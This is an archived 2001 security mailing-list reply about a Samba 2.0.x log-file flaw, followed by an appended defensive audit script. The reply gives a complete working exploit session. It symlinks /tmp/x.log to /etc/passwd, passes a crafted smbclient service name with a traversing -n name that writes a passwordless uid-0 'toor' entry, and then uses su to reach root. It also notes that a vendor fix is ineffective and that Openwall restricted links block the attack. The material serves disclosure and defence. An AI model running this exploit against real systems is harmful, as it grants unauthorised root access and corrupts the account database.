On Mon, Jun 25, 2001 at 12:14:02AM +0200, maniacat_private wrote:
>
> Hi,
>
> Mandrake 7.1 (Mandrake 8.0 and RedHat 6.2) logs here by default:
> /var/log/samba/log.%m
>
> I replaced it with /var/log/samba/%m.log and used your exploit, which
> worked - this line was also appended to /etc/passwd:
>   toor::0:0::/:/bin/sh
>
> But as long as there were those two spaces at the beginning of the line,
> it was impossible to su to that account; this is the error message:
>
> Jun 24 23:28:55 localhost PAM_pwdb[23844]: check pass; user unknown
>
> I tried to insert \r after the first \n, but unsuccessfully.
> I'm using pam-0.72-7mdk.
>
> These versions of PAM also don't permit spaces at the beginning of a line:
> pam-0.72-20.6.x (RedHat 6.2)
> pam-0.74-6mdk (Mandrake 8.0)
>
> Maybe sshd without PAM support and permitting empty passwords may be
> 'vulnerable' on such systems.

[wilder@lysurus wilder]$ cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for i586
[wilder@lysurus wilder]$ rpm -q pam
pam-0.74-6mdk
[wilder@lysurus wilder]$ egrep "log file" /etc/smb.conf
# this tells Samba to use a separate log file for each machine
   log file = /var/log/samba/%m.log      (= changed from default log.%m)
# Put a capping on the size of the log files (in Kb).
[wilder@lysurus wilder]$ rpm -qf /usr/sbin/smbd
samba-2.0.9-1.3mdk
[wilder@lysurus wilder]$ ln -s /etc/passwd /tmp/x.log
[wilder@lysurus wilder]$ smbclient //localhost/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
added interface ip=10.0.0.43 bcast=10.0.0.255 nmask=255.255.255.0
Anonymous login successful
Domain=[UI42] OS=[Unix] Server=[Samba 2.0.9]
[wilder@lysurus wilder]$ tail /etc/passwd
..
..
[2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927)
  Rejecting user 'wilder': authentication failed
[2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213)
  ../../../tmp/x (127.0.0.1) couldn't find service 
toor::0:0::/:/bin/sh
[wilder@lysurus wilder]$ su toor
[root@lysurus wilder]#

Appending to /etc/passwd has nothing to do with PAM.

The Mandrake security fix in samba-2.0.9-1.3mdk does not solve this security problem. This exploit works with samba 2.0.8 without problems, too.

Linux kernels with the Openwall patch (with restricted links in /tmp) are immune to this type of attack (following symlinks does not work, since the link owner does not match the file's owner).

Cheers,
Pavol

--
_______________________________________________________________________
[wilderat_private] [http://hq.alert.sk/~wilder] [talker: ttt.sk 5678]
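A defender-side audit for the two conditions the message above combines (a Samba "log file" path built from the client-chosen %m name, and symlinks a root daemon would follow into a file owned by someone else), written for this archive entry and not part of Pavol's post; it assumes GNU find and stat and takes the smb.conf path and the log directory as arguments:

```shell
#!/bin/sh
# Added audit helper (not code from the original post). Assumes GNU find/stat.

# Print the value of "log file" from an smb.conf (last definition wins).
smb_log_file_setting() {
    sed -n 's/^[[:space:]]*[Ll]og [Ff]ile[[:space:]]*=[[:space:]]*//p' "$1" | tail -n 1
}

# Exit 0 if the log path interpolates the client machine name (%m), which
# lets a client pick the file name smbd opens for writing as root.
logfile_uses_client_name() {
    case "$(smb_log_file_setting "$1")" in
        *%m*) return 0 ;;
        *)    return 1 ;;
    esac
}

# List symlinks under a directory whose owner differs from the owner of the
# file they point to, or which dangle. This is the case the Openwall
# restricted-links patch refuses to follow; a root daemon writing through
# such a link is what put the extra line into /etc/passwd in the thread.
suspect_symlinks() {
    find "$1" -type l 2>/dev/null | while read -r link; do
        link_uid=$(stat -c %u "$link")
        target_uid=$(stat -L -c %u "$link" 2>/dev/null) || target_uid=dangling
        [ "$link_uid" = "$target_uid" ] || echo "$link -> $(readlink "$link")"
    done
}

# Combined audit: print warnings and return 1 if either condition holds.
audit_samba_logging() {
    conf=$1; dir=$2; rc=0
    if logfile_uses_client_name "$conf"; then
        echo "WARN: log file = $(smb_log_file_setting "$conf") uses %m"
        rc=1
    fi
    links=$(suspect_symlinks "$dir")
    if [ -n "$links" ]; then
        echo "WARN: symlinks with mismatched owner under $dir:"
        echo "$links"
        rc=1
    fi
    return $rc
}
```

Run it as `audit_samba_logging /etc/smb.conf /var/log/samba` after sourcing the file; a non-zero exit means at least one of the two conditions is present on the host.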
This archive was generated by hypermail 2b30 : Mon Jun 25 2001 - 15:37:08 PDT